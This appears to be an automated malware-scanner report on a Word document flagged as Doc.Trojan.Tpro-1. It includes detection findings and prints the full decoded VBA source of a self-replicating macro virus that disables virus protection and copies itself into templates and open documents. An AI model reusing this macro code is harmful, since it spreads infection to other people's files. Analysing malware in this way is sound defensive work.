Verdict: MALICIOUS (Risk Score: 180)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV and contains AutoOpen and AutoClose VBA macros. The AutoClose macro explicitly disables virus protection (Application.Options.VirusProtection = False). The AutoOpen macro also disables virus protection, then iterates over every loaded template and open document: where a Module1 with an unexpected line count is found, it removes the project's other VBA components, exports its own Module1 to a fixed path under the Office Templates directory (Basic.bas), imports that file into the target project and saves it. This modifies application templates, potentially to establish persistence or distribute further malware. The exact payload or ultimate goal is unclear due to truncation, but the techniques indicate a downloader or dropper.
Heuristics (5)
- ClamAV: Doc.Trojan.Tpro-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Tpro-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7402 bytes |
SHA-256 (macros.bas): d66e52110302777029a73ff72d7049dde03ee0ad36d73ef3431dd848e0151537
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoClose()
Application.Options.VirusProtection = False
End Sub
Sub AutoOpen()
On Error GoTo ErrorCL
Const aLin As Long = 73
Dim aTemp As Variant
Dim aTName As String
Dim aTPro As Variant
Dim aPro As Variant
Dim aName As String
Dim aDoc As Variant
Dim aCodeLin As Long
Dim aTCodeLin As Long
With Application.Options
.VirusProtection = False
.SaveInterval = 1
End With
'D--N
For Each aTemp In Application.Templates
With aTemp.VBProject
aTName = .VBComponents(1).Name
aTCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
If aTCodeLin <> aLin Then
For Each aTPro In .VBComponents
If aTPro.Name <> aTName Then
.VBComponents.Remove (aTPro)
End If
Next aTPro
ActiveDocument.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
.VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
aTemp.Save
.VBComponents(1).Name = "ThisDocuments"
End If
End With
Next aTemp
'N--D
For Each aDoc In Application.Documents
With aDoc.VBProject
aName = .VBComponents(1).Name
aCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
If aCodeLin <> aLin Then
For Each aPro In .VBComponents
If aPro.Name <> aName Then
.VBComponents.Remove (aPro)
End If
Next aPro
.VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
Application.ActiveDocument.Save
End If
End With
Next aDoc
Exit Sub
ErrorCL:
Select Case Err.Number
Case 53 'There is Not Basic.bas
Application.NormalTemplate.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
Resume
Case -2147352565
aCodeLin = 0
Resume Next
End Select
End Sub
' Processing file: /opt/analyzer/scan_staging/27ebbe4f46774e1594d8272c72704274.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Module1 - 3906 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' LitVarSpecial (False)
' Ld Application
' MemLd Options
' MemSt VirusProtection
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub AutoOpen())
' Line #4:
' OnError ErrorCL
' Line #5:
' Line #6:
' Dim (Const)
' LitDI2 0x0049
' VarDefn aLin (As Long)
' Line #7:
' Line #8:
' Dim
' VarDefn aTemp (As Variant)
' Line #9:
' Dim
' VarDefn aTName (As String)
' Line #10:
' Dim
' VarDefn aTPro (As Variant)
' Line #11:
' Dim
' VarDefn aPro (As Variant)
' Line #12:
' Dim
' VarDefn aName (As String)
' Line #13:
' Dim
' VarDefn aDoc (As Variant)
' Line #14:
' Dim
' VarDefn aCodeLin (As Long)
' Line #15:
' Dim
' VarDefn aTCodeLin (As Long)
' Line #16:
' Line #17:
' StartWithExpr
' Ld Application
' MemLd Options
' With
' Line #18:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #19:
' LitDI2 0x0001
' MemStWith SaveInterval
' Line #20:
' EndWith
' Line #21:
' Line #22:
' QuoteRem 0x0005 0x0004 "D--N"
' Line #23:
' StartForVariable
' Ld aTemp
' EndForVariable
' Ld Application
' MemLd Templates
' ForEach
' Line #24:
' StartWithExpr
' Ld aTemp
' MemLd VBProject
' With
' Line #25:
' LitDI2 0x0001
' ArgsMe
... (truncated)